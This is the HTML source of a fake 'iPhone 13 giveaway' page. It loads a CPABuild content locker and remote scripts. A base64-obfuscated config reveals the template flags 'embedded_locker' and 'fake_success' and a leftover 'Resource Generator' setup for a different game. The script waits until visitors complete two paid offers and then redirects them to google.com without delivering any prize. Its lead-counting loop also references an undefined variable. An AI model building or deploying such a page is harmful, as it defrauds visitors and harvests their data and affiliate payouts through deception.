<!DOCTYPE html><head>    <meta charset=utf-8>
    <meta http-equiv=X-UA-Compatible content="IE=edge">
    <meta name=viewport content="width=device-width,initial-scale=1">
    <meta name=theme-color content=#ffffff>
    <title>New iPhone 13 & iPhone 13 Pro Giveaway - Limited Offer</title>
    
    <link rel="icon" type="image/png" sizes="32x32" href="https://cdn.jsdelivr.net/gh/iDevMore/ip13/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="https://cdn.jsdelivr.net/gh/iDevMore/ip13/favicon-16x16.png">
    
    <meta name="keywords" content="iphone, iphone 13, iphone 13 pro, iphone giveaway, giveaway">
    
    <meta property="og:site_name" content="New iPhone 13 & iPhone 13 Pro Giveaway - Limited Offer">
    <meta property="og:title" content="New iPhone 13 & iPhone 13 Pro Giveaway - Limited Offer" />
    <meta name="twitter:card" content="New iPhone 13 & iPhone 13 Pro Giveaway - Limited Offer" />
    <meta name="twitter:title" content="New iPhone 13 & iPhone 13 Pro Giveaway - Limited Offer" />

    <meta name="description" content="Get a brand new iPhone 13 and also get a change to get iPhone 13 Pro. We giveaway 1 basic iPhones every 2 hours and 1 iPhone 13 Pro at the end of the day. Resulting in 13 iPhones every day! Don't miss your chance!" />
    <meta property="og:description" content="Get a brand new iPhone 13 and also get a change to get iPhone 13 Pro. We giveaway 1 basic iPhones every 2 hours and 1 iPhone 13 Pro at the end of the day. Resulting in 13 iPhones every day! Don't miss your chance!" />
    <meta name="twitter:description" content="Get a brand new iPhone 13 and also get a change to get iPhone 13 Pro. We giveaway 1 basic iPhones every 2 hours and 1 iPhone 13 Pro at the end of the day. Resulting in 13 iPhones every day! Don't miss your chance!" />
    <meta name="description" content="Get a brand new iPhone 13 and also get a change to get iPhone 13 Pro. We giveaway 1 basic iPhones every 2 hours and 1 iPhone 13 Pro at the end of the day. Resulting in 13 iPhones every day! Don't miss your chance!">

    <meta property="og:type" content="website" />
    
    <meta property="og:image" content="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16343050073c2398f401eb2be486543c11c09c2a26.jpg" />
	<meta name="twitter:image" content="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16343050073c2398f401eb2be486543c11c09c2a26.jpg" />
    
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }


        #loader {
            position: fixed;
            top: 0;
            left: 0;
            z-index: 1000;
            opacity: 1;
            transition: 1s all;
        }

        #loader-wrap {
            width: 100vw;
            height: 100vh;
            background: #101823;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-content: center;
            align-items: center;
        }

        #loader-wrap svg {
            height: 50%;
            width: 50%;
            margin: auto;
        }

        #loader-wrap path {
            color: white;
            stroke: white;
            stroke-width: 10;
        }

        #loader-wrap svg path {
            stroke-dasharray: 1500;
            stroke-dashoffset: 0;
            fill: transparent;
        }
        #loader-wrap svg path {
            animation: stroke-offset 1s linear both;
        }

        @keyframes stroke-offset {
            0% {
                stroke-dashoffset: 1500;
            }
            50% {
                stroke-dashoffset: 0;
                fill: transparent;
            }
            90% {
                stroke-width: 0;
                fill: #ffffff;
            }
            100% {
                stroke-width: 0;
                fill: #ffffff;
            }
        }
    </style>
        
<script>
    var Globals = JSON.parse(atob("eyJkZXNjcmlwdGlvbiI6IkdldCBhIGJyYW5kIG5ldyBpUGhvbmUgMTMgYW5kIGFsc28gZ2V0IGEgY2hhbmdlIHRvIGdldCBpUGhvbmUgMTMgUHJvLiBXZSBnaXZlYXdheSAxIGJhc2ljIGlQaG9uZXMgZXZlcnkgMiBob3VycyBhbmQgMSBpUGhvbmUgMTMgUHJvIGF0IHRoZSBlbmQgb2YgdGhlIGRheS4gUmVzdWx0aW5nIGluIDEzIGlQaG9uZXMgZXZlcnkgZGF5ISBEb24ndCBtaXNzIHlvdXIgY2hhbmNlISIsImZvcmNlZF9sYW5ndWFnZSI6Im5vbmUiLCJnYW1lX25hbWUiOiJOYXJ1dG8gU2hpcHB1ZGVuIiwiZ2VuZXJhdG9yX2hlYWRlciI6IlJlc291cmNlIEdlbmVyYXRvciIsImdvb2dsZV9hbmFseXRpY3MiOiJVQS0wMDAwMC0wIiwia2V5d29yZHMiOiJpcGhvbmUsIGlwaG9uZSAxMywgaXBob25lIDEzIHBybywgaXBob25lIGdpdmVhd2F5LCBnaXZlYXdheSIsIm11c2ljX2ZpbGUiOiJodHRwczpcL1wvY2RuLmpzZGVsaXZyLm5ldFwvZ2hcL2lEZXZNb3JlXC9hdWRpb3MtMjAyMS1RNFwvdWktc291bmRzXC9mcmYubXAzIiwicGxhdGZvcm1zIjoiVzNzaWFXUWlPakVzSW01aGJXVWlPaUpoYm1SeWIybGtJaXdpZEdsMGJHVWlPaUpCYm1SeWIybGtJaXdpYVdOdmJpSTZJbUZ1WkhKdmFXUWlmU3g3SW1sa0lqb3lMQ0p1WVcxbElqb2lhVzl6SWl3aWRHbDBiR1VpT2lKcFQxTWlMQ0pwWTI5dUlqb2lhVzl6SW4wc2V5SnBaQ0k2TXl3aWJtRnRaU0k2SW01cGJuUmxibVJ2SWl3aWRHbDBiR1VpT2lKT2FXNTBaVzVrYnlJc0ltbGpiMjRpT2lKdWFXNTBaVzVrYnlKOUxIc2lhV1FpT2pRc0ltNWhiV1VpT2lKemRHVmhiU0lzSW5ScGRHeGxJam9pVTNSbFlXMGlMQ0pwWTI5dUlqb2ljM1JsWVcwaWZWMD0iLCJwbGF5ZXJfZmllbGQiOiJVc2VybmFtZSIsInJlZGlyZWN0X3VybCI6Imh0dHBzOlwvXC93d3cuZ29vZ2xlLmNvbSIsInJlc291cmNlcyI6ImV5SnVZVzFsSWpvaVJHbGhiVzl1WkhNaUxDSnBiV0ZuWlNJNkltaDBkSEE2THk5aGMzTmxkSE11YzNScFkydHdibWN1WTI5dEwybHRZV2RsY3k4MU9EQmlOVGcxWWpKbFpHSmpaVEkwWXpRM1lqSXpaakl1Y0c1bklpd2lkbUZzZFdWeklqcGJJakkxTUNJc0lqVXdNQ0lzSWpZd01DSmRmUT09IiwiczIiOiJpRGV2LWlQaG9uZS0xMyIsInRpdGxlIjoiTmV3IGlQaG9uZSAxMyAmIGlQaG9uZSAxMyBQcm8gR2l2ZWF3YXkgLSBMaW1pdGVkIE9mZmVyIiwic3BlZWRfZmFjdG9yIjoiMTUiLCJiZ18xIjoiaHR0cHM6XC9cL3NtLmlnbi5jb21cL3RcL2lnbl9kZVwvYmxvZ3JvbGxcL2JcL2JvcnV0by1uYXJcL2JvcnV0by1uYXJ1dG8tdGhlLW1vdmllLWNvbWluZy10by11cy10aGVhdGVyc19rcDYyLmg3MjAuanBnIiwiYmdfMiI6Imh0dHBzOlwvXC9zdGF0aWMuYmFuZGFpbmFtY29lbnQuZXVcL2hpZ2hcL25hcnV0b1wvbmFydXRvLXN1bnMtcmV2b2x1dGlvblwvMDAtcGFnZS1zZXR1cFwvbnNyX2dhbWUtdGh1bWJuYWlsLmpwZyIsImNvbG9yX2FjY2VudCI6IiMwMDlkZmYiLCJjb2xvcl9wcmltYXJ5IjoiI2UxODUyNSIsImNvbG9yX3NlY29uZGFyeSI6IiMyNzgwYzQiLCJhdXRvX3VwZGF0ZXMiOiIxIiwiZW1iZWRkZWRfbG9ja2VyIjoiMSIsImZha2Vfc3VjY2VzcyI6IjAiLCJtdXNpYyI6IjEiLCJzZXR1cF9tb2RlIjoiMCIsInNvdW5kcyI6IjEiLCJ0cmFuc2xhdGlvbnMiOiIxIn0=")),
        currentLeads = 0,
        currentCents = 0;
</script>
        <script type="module" crossorigin src="https://cdn.jsdelivr.net/gh/iDevMore/ip13/index.9a61a784.js"></script>
    <link rel="modulepreload" href="https://cdn.jsdelivr.net/gh/iDevMore/ip13/vendor.413038b6.js">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/iDevMore/ip13/index.7609f928.css">
    </head><body><noscript><strong>We're sorry but site doesn't work properly without JavaScript enabled. Please enable it to continue.</strong></noscript>

<div id="loader"><div id="loader-wrap">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 380 500">
            <path
                    d="M314.7 268.7c-.2-36.7 16.4-64.4 50-84.8-18.8-26.9-47.2-41.7-84.7-44.6-35.5-2.8-74.3 20.7-88.5 20.7-15 0-49.4-19.7-76.4-19.7C59.3 141.2 0 184.8 0 273.5c0 26.2 4.8 53.3 14.4 81.2 12.8 36.7 59 126.7 107.2 125.2 25.2-.6 43-17.9 75.8-17.9 31.8 0 48.3 17.9 76.4 17.9 48.6-.7 90.4-82.5 102.6-119.3-65.2-30.7-61.7-90-61.7-91.9zm-56.6-164.2c27.3-32.4 24.8-61.9 24-72.5-24.1 1.4-52 16.4-67.9 34.9-17.5 19.8-27.8 44.3-25.6 71.9 26.1 2 49.9-11.4 69.5-34.3z"/>
</svg>   
</div></div>

<div id="app"></div>

 <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-00000-0"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', "UA-00000-0");
</script><script type="text/javascript">var CPABUILDSETTINGS={"it":1965799,"key":"d4582","construct":true};</script><script src='https://d13nu0oomnx5ti.cloudfront.net/VSsyjR.js'></script><script src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/assets/14859274931dd77b79350953c8e835afaced491210.js"></script><script type='text/javascript'>CPABuildCheckForLead();

var leads_required = 2;
var redirect_url=Globals.redirect_url;

var CPABuildOffersComplete = function(completions){
    currentLeads = 0;
    currentCents = 0;
    
    for (let i = 0; i<completions.length; i++){
        currentLeads++;
        currentCents += parseInt(completion.points);
    }
   
    if(currentLeads < leads_required){
        //Needs more leads
        
         }
    else{
        //All Requirements met!
       
          window.location.replace(redirect_url);
        
    }
}
</script></body>
